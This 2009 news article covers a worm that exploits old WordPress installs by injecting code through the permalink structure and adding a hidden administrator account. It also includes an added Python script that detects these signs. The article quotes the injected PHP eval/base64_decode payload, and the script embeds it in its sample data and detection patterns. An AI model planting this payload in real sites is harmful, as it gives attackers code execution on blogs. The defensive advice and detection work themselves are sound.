Blog owners are advised to upgrade immediately

Sep 8, 2009 08:56 GMT

A Web worm that spreads by exploiting a vulnerability in older versions of WordPress has put the blogosphere in alert mode. Once it compromises a vulnerable installation, the worm begins to taint older blog entries with malicious links and, in some cases, it can even destroy data.

Reports of hacked, WordPress-powered blogs started flowing in late last week, and there seem to be some tell-tale signs of a possible compromise. According to Lorelee's blog about blogging, this worm modifies the structure of WordPress pretty permalinks to something like example.com/category/post-title/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/. "The keywords are 'eval' and 'base64_decode,'" she points out.

The vulnerability exploited by this worm allows it to create a secondary, hidden Administrator account. Therefore, seeing something like "Administrator (2)" in the user list is a good indication that something has gone terribly wrong. Other names that don't belong there can also point to a compromise.
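The two indicators above can be checked directly against the database, which matters because the worm hides the extra account from the dashboard's Users page. The following checker is an added example, not code from the article or from WordPress; the row layout it expects (the permalink_structure value from wp_options and user rows with login, display name and role) and the sample data are constructed.

```python
import re

# Indicators the article describes: a permalink structure carrying
# eval()/base64_decode() of a request header, and an extra "Administrator (2)"
# style account that the worm hides from the dashboard's Users page.
PERMALINK_INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "superglobal": re.compile(r"\$_(SERVER|GET|POST|REQUEST|COOKIE)\b", re.I),
    "interpolation": re.compile(r"\$\{"),  # PHP {${...}} code-in-string trick
}
DUPLICATE_ADMIN = re.compile(r"^Administrator \(\d+\)$", re.I)


def check_permalink_structure(structure: str) -> list:
    """Return the indicator names found in a wp_options permalink_structure value."""
    return [name for name, pat in PERMALINK_INDICATORS.items() if pat.search(structure)]


def find_suspicious_users(users: list, expected_admins: set) -> list:
    """Flag administrator rows that are not on the owner's known list or that
    look like the worm's duplicate account. `users` is a constructed shape:
    dicts with user_login, display_name and role (from the capabilities meta)."""
    findings = []
    for u in users:
        reasons = []
        if u["role"] == "administrator" and u["user_login"] not in expected_admins:
            reasons.append("unexpected administrator login")
        if DUPLICATE_ADMIN.match(u["display_name"]):
            reasons.append("display name mimics a duplicate Administrator")
        if reasons:
            findings.append((u["user_login"], reasons))
    return findings


# Constructed sample data in the shape of the database rows, not real blog data.
CLEAN_PERMALINK = "/%category%/%postname%/"
INFECTED_PERMALINK = (
    "/%category%/%postname%/"
    "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
)
SAMPLE_USERS = [
    {"user_login": "admin", "display_name": "Administrator", "role": "administrator"},
    {"user_login": "jane", "display_name": "Jane", "role": "editor"},
    {"user_login": "x7q2", "display_name": "Administrator (2)", "role": "administrator"},
]

if __name__ == "__main__":
    print("permalink indicators:", check_permalink_structure(INFECTED_PERMALINK))
    print("suspicious users:", find_suspicious_users(SAMPLE_USERS, {"admin"}))
```

Run it against values pulled with a direct SQL query rather than the admin UI, since the page notes the worm uses JavaScript to hide its account there.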

"This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users' page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts," Matt Mullenweg, WordPress co-founder, explains on the platform's official development blog.

According to Matt, the vulnerability exploited in this attack has been patched since WordPress 2.8.3. However, updating to 2.8.4, the latest stable version, is strongly recommended, as updating is much easier than cleaning up a compromised blog. As Matt puts it, "Upgrading is taking your vitamins; fixing a hack is open heart surgery."

But what if your blog has already been hacked and you're reading this too late? Well, the quickest and safest way to recover seems to be exporting all content with WordPress' built-in XML export feature, along with any custom images. Simply copying the database is not an option, as this hack modifies it. However, restoring from an old, unaffected database backup, if you happen to keep one, as you normally should, could also be a solution.

It is worth mentioning for less technical users that this threat does not affect third-party-managed blogging services such as those offered on WordPress.com, but only do-it-yourself installations using the distributable package available on WordPress.org.